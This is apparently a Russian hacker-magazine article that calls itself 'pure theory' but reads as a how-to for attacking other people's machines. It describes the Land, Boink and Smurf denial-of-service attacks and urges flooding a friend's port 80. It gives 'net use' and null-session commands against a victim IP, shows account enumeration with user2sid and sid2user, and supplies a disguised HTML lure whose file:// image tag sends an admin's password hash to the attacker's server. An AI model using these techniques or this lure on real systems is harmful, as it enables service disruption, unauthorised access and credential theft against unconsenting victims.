Привет перец, ты конечно же юзал такие проги, как нюк, залезал к бедным ламерам на винты ..., а знаешь ли ты, как всё это работает ?
Сегодня пойдёт чистая теория. И не надо строить кислые мины, настоящий хакер силён знанием, а не
умением давить на всякие пимпы 🙂

Начнем мы с атак на отказ в обслуживании (DoS) : 

Атака Land 

Суть атаки заключается в том, что адрес отправителя пакета изменён на адрес получателя (это возможно сделать, так как в заголовке IP пакета нет ни одного
идентифицирующего поля , кроме Source Address, так вот в этом поле и пишем АйПи жертвы). Source Address = Destination Address, номера портов также идентичны... Source port Number = Destination Port
Number. Получается IP пакетик направленный сам на себя. Итак, в заголовке указываем АйПи жертвы, а порт ... любой открытый порт на машине. Результат, как правило, у ВИН95 - синий экран, ВиН НТ замирал и не подавал признаков жизни в течении минуты ... от ОДНОГО Ленд пакета, но кто запрещает послать тысячу ленд запросов ??? Пример такой атаки: land.c под *nix .

Атака Boink

Эта капуста основана на глюке некоторых ОС (Линукс 2.0.0, Вин Нт) при сборе фрагментов в пакете. Ну, а почему? Да потому! После
сборки фрагментов в нашем пакетике остаются пустые места, то есть нет данных, и операционная система, ни черта не понимая, зависает.

Атака Smurf

Если ты отправишь запрос Echo Request/Replay адресу 215.255.255.255, то тебе придут ответы от всех компов, начиная с 215.0.0.1 до 215.254.254.254, таких компов может быть много :)) Это
называется широковещательный запрос. Вспоминай ленд атаку... дошло? Нет? Мда, тяжёлый случай 🙂 Ты уж и забыл, что можно в заголовке пакета поменять АйПи отправителя на АйПи жертвы, теперь все эти ответы пойдут не тебе, а тому чей адрес ты подставил. 

Конечно все эти атаки хороши , но что, если у твоего друга фаерволл ??? Все порты закрыты...
Все? Не все! Ведь твой друг наверняка забирает почту, ходит по порносайтам и т.д., бери и отправляй дохрена запросов на 80 порт врага (при условии что коннект у него диал-ап) ... . Вот и друг больше не может посмотреть на бритую с пирса 🙂 

Теперь про шары 🙂

Кто-то разрешил доступ на диск C: своему соседу по локалке, и при этом решил выйти в интернет, чтоб доглядеть то, что
не удалось посмотреть твоему другу, так как ты засрал ему 80 порт :))) "net use * \\215.25.21.1\ DISC_C password
/USER:user" -подключение к диску С:. Правда тут загвоздка: Пароль и Имя . Если у вашей жертвы НТ 3.5, то можно подключиться анонимно к специально открытому ресурсу IPC$ , а имя и логин оставить пустыми "net use \\215.25.21.1\IPC$ ""/USER: "" " . Но фишка не пройдёт при СевисПаке3 🙁 В сети, конечно, можно найти такие машины, но их очень мало. Можно попробовать узнать имя юзера и пароль, но как? SMB протокол поможет 🙂 Сначала имя пользователя, а лучше админа :)) Узнать имя можно с помощью двух прог, написанных нашим
соотечественником: sid2user и user2sid. Для начала надо узнать SID
(security identifier) который состоит из нескольких цифр, идентификатор безопасности и номер версии, следующая группа цифр - это номер ведомств, и ещё группа цифр - номер подразделения. Итак узнаём логин, для этого введи в командной строке ДОС из
директории, где находится прога user2sid : user2sid \\215.25.21.1 "Domain Users". Мы получаем SID (например
S-1-4-31-123456789-87654321-12345678-513) по имени (LookupAccountName), а далее наоборот, запускаем программу sid2user : - sid2user \\215.25.21.1 4 31 123456789 87654321 12345678 500,
обрати внимание на последние три цифры - 500, это RID админа 🙂 Смотри логин ... Всё !
Пароль, пароль ... Ноу проблем! Хотя всё же без проблем нельзя, 
суть её не техническая, а психологическая . Тут надо быть знакомым с Социальной Инженерией. Это тебе не троян впаривать, хотя можешь
попробовать впарить троян админу. Протокол SMB и это значит, что пароль в сети передаётся в открытом виде, осталось его перехватить ... А что бы перехватить пароль, надо либо с помощью соц. инженерии попросить врага законнектиться с твоим компом... 
или ЗАСТАВИТЬ комп админа соединиться с твоим . Короче, дело к ночи, надобно состряпать ХТМЛ файл и послать его админу. Чтоб админ ничего не заподозрил, вставь туда банеры и какой-нить рекламный текст, мол: ЗЕЛЁНЫЕ ХОМЯЧКИ, ПОСЛЕ УПОТРЕБЛЕНИЯ НАШЕГО КОРМА ( Уран235 ... :))) НО не забудь написать такую фичу:
<IMG SRC="file:////Tvoi_server.com/catalog/image.gif">.Это заставит браузер 
админа присоединится к SMB-серверу Tvoi_Server.com. WiNNT передаст хэш-пароль (кстати и имя тоже), а что б принять этот пароль используй сниффер
(SpyNeT). 

На этом позволь откланяться, с вами был Дон Хуан, да прибудет с 
тобой сила и знание 🙂

Check Also

KRACK на практике. Как работает атака на Wi-Fi с применением нашумевшей техники

Осенью 2017 года мир узнал о новой угрозе безопасности сетей Wi-Fi. Она затрагивает абсолю…

Оставить мнение